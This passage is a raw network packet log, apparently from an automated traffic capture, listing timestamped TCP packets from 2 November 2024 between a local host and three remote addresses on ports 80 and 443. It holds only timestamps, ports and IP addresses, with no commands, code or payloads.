                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058353901 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058357000 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058372974 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058388948 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058391094 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058402061 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058413029 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058415890 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058423996 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058434010 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058449984 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058449984 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058460951 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058476925 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058478117 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058490038 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058492899 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058521032 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058521986 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058535099 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058547020 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058547974 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058559895 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058571100 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058579922 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058610916 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058638096 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058650017 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058660984 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058672905 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058676004 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058686018 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058697939 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058710098 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058710098 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058738947 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058742046 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058749914 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058762074 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058765888 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058773994 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058792114 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058820009 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058919907 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058959007 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058969021 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058980942 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.058991909 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059003115 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059010983 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059017897 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059030056 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059030056 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059042931 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059055090 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059065104 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059065104 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059078932 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059098005 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059113026 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059124947 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059124947 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059151888 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059164047 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059168100 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059179068 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059190989 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059201956 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059211969 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059241056 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059276104 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059288979 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059299946 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059318066 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059319019 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059329987 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059349060 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059384108 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059385061 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059458971 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059470892 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059494972 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059509039 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059519053 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059530020 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059557915 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059566975 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059587955 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059596062 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059608936 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059621096 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059686899 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059700012 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059710979 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059798002 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059809923 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059822083 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059885979 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059902906 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059902906 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059914112 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059925079 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059937000 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059940100 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059947014 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059952974 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059963942 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059974909 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059981108 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059986115 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.059999943 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.060009003 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.060026884 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.060048103 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.060123920 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.060136080 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.060148001 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.060158014 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.060159922 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.060172081 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.060173988 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.060199022 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.060221910 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.117085934 CET4436387413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.117680073 CET63874443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.117693901 CET4436387413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.118139982 CET63874443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.118146896 CET4436387413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.132632017 CET4436387613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.133235931 CET63876443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.133272886 CET4436387613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.133702040 CET63876443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.133713007 CET4436387613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.140615940 CET4436387513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.141129971 CET63875443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.141146898 CET4436387513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.141716003 CET63875443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.141721964 CET4436387513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.144994020 CET4436387813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.145373106 CET63878443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.145387888 CET4436387813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.145764112 CET63878443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.145773888 CET4436387813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.172009945 CET4436387713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.172569036 CET63877443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.172617912 CET4436387713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.173106909 CET63877443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.173122883 CET4436387713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.255844116 CET4436387413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.255903959 CET4436387413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.255964994 CET63874443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.259239912 CET63874443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.259249926 CET4436387413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.259260893 CET63874443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.259265900 CET4436387413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.262080908 CET4436387613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.262120008 CET4436387613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.262188911 CET63876443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.262770891 CET63876443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.262795925 CET4436387613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.262820005 CET63876443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.262833118 CET4436387613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.272229910 CET63879443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.272274017 CET4436387913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.272286892 CET4436387513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.272315979 CET4436387513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.272353888 CET63879443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.272356987 CET4436387513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.272384882 CET63875443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.272408009 CET63875443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.272495985 CET63879443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.272516012 CET63880443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.272525072 CET4436387913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.272542953 CET4436388013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.272605896 CET63880443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.272744894 CET63880443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.272758961 CET4436388013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.272779942 CET63875443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.272795916 CET4436387513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.272825003 CET63875443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.272831917 CET4436387513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.273535013 CET4436387813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.273593903 CET4436387813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.274195910 CET63878443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.274832010 CET63881443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.274866104 CET4436388113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.274930000 CET63881443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.275111914 CET63878443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.275113106 CET63878443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.275131941 CET4436387813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.275154114 CET4436387813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.276232958 CET63881443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.276247025 CET4436388113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.278594017 CET63882443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.278601885 CET4436388213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.278822899 CET63882443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.278933048 CET63882443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.278943062 CET4436388213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.307635069 CET4436387713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.307704926 CET4436387713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.307760000 CET63877443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.308409929 CET63877443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.308409929 CET63877443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.308432102 CET4436387713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.308455944 CET4436387713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.311439991 CET63883443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.311459064 CET4436388313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.311544895 CET63883443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.311649084 CET63883443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.311660051 CET4436388313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.351445913 CET44363873188.114.96.3192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.351528883 CET44363873188.114.96.3192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.351763010 CET63873443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.351959944 CET63873443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.351974964 CET44363873188.114.96.3192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.583930016 CET63884443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.583969116 CET44363884188.114.96.3192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.584038019 CET63884443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.587428093 CET63884443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:23.587449074 CET44363884188.114.96.3192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.015966892 CET4436388213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.025021076 CET4436388013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.031178951 CET4436388113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.032594919 CET4436387913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.044622898 CET63879443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.044666052 CET4436387913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.045073032 CET63879443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.045087099 CET4436387913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.045317888 CET63882443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.045342922 CET4436388213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.046168089 CET4436388313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.047451019 CET63882443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.047455072 CET4436388213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.047683954 CET63883443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.047703028 CET4436388313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.048049927 CET63883443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.048057079 CET4436388313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.073568106 CET63880443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.073575020 CET63881443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.082672119 CET63880443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.082674980 CET4436388013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.083034992 CET63880443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.083039045 CET4436388013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.083405018 CET63881443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.083412886 CET4436388113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.083817959 CET63881443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.083825111 CET4436388113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.174396038 CET4436388213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.174446106 CET4436388213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.174505949 CET63882443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.175967932 CET4436388313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.175988913 CET4436388313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.176024914 CET4436388313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.176059961 CET63883443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.176059961 CET63883443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.178746939 CET4436387913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.178771973 CET4436387913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.178803921 CET4436387913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.178838968 CET63879443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.178873062 CET63879443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.182512045 CET63882443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.182512045 CET63882443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.182523012 CET4436388213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.182533979 CET4436388213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.206231117 CET63883443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.206248999 CET4436388313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.206304073 CET63883443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.206311941 CET4436388313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.210555077 CET63879443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.210556030 CET63879443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.210582018 CET4436387913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.210606098 CET4436387913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:24.211709023 CET4436388013.107.246.45192.168.2.4
